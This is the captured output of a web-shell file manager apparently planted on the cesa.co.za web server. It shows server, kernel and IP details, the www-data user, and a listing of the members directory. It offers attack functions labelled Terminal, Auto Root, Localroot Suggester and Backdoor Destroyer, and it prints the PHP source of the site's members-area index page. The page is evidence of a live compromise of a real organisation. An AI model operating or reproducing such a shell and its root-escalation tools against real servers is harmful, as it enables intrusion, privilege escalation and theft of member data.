Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
members /
Delete
Unzip
Name
Size
Permission
Date
Action
AnnualDeclaration
[ DIR ]
drwxr-sr-x
2019-12-19 07:10
AnnualDeclaration_Part1
[ DIR ]
drwxr-sr-x
2023-01-11 10:14
inc
[ DIR ]
drwxr-sr-x
2025-03-07 12:21
pics
[ DIR ]
drwxr-sr-x
2008-01-09 07:51
pwd
[ DIR ]
drwxr-sr-x
2008-01-09 07:51
saaceadmin
[ DIR ]
drwxr-sr-x
2017-10-25 14:17
index.php
2.06
KB
-rw-r--r--
2019-12-19 07:05
index.php4
2.16
KB
-rw-r--r--
2008-08-07 05:01
php_errors.log
933
B
-rw-r--r--
2026-08-20 21:50
Save
Rename
<?php // Configuration and Autentication include( '../inc/member_auth.inc' ); include( '../inc/funcinternational.inc' ); switch ($auth) { case valid: // System Includes //include( 'inc/pref.inc' ); // Variables Unique to page $title = "Welcome to CESA Members Business Centre"; $description = "Consulting Engineers of South Africa. Members only Online Business Centre StartPage."; $keywords = "online, services, members, consulting, engineers"; // Start Page Includes include( '../inc/conf.inc' ); include( '../inc_header.php4' ); ?> <!-- Start Page Content Here --> <table width="100%" cellpadding="10" border="0" cellspacing="0"><tr><td valign="top"> <h2>Welcome <?php echo $firstname; ?></h2> </p> <p> The CESA Member Zone has been integrated into the main CESA website. Please use the menu on the left to access advisory notes, documentation, NLC reports etc. If asked for a username and password, use your member zone username and password to access sensitive information. </p> <p> Useful links are listed below, for your convenience: </p> <p><ul> <li><a href="/advisory_full.php">Advisory Notes</a></li> <li><a href="/annualdeclaration.php4">Annual Declaration</a></li> <li><a href="/memberdocuments.php">Documentation</a></li> <li><a href="/enews.php4">eNews</a></li> <li><a href="/nlc.php">National Liaison Committees and Matrix</a></li> </ul> </p> </td></tr></table> <br> <!-- End Page Content Here --> <?php // End page Includes include( '../inc_footer.php4' ); break; case invalid: header("Location: http://www.cesa.co.za/login.php4?pageurl=/members/index.php4"); //systemerror("Login Error","Initial Login Failure",getenv ("PATH_INFO"), $authorized); break; default: systemerror("System Error","System Failure on Authentication",getenv ("PATH_INFO"), "There is a problem logging into our system. Try again later or if the problem persists, please contact CESA to report the problem."); break; } ?>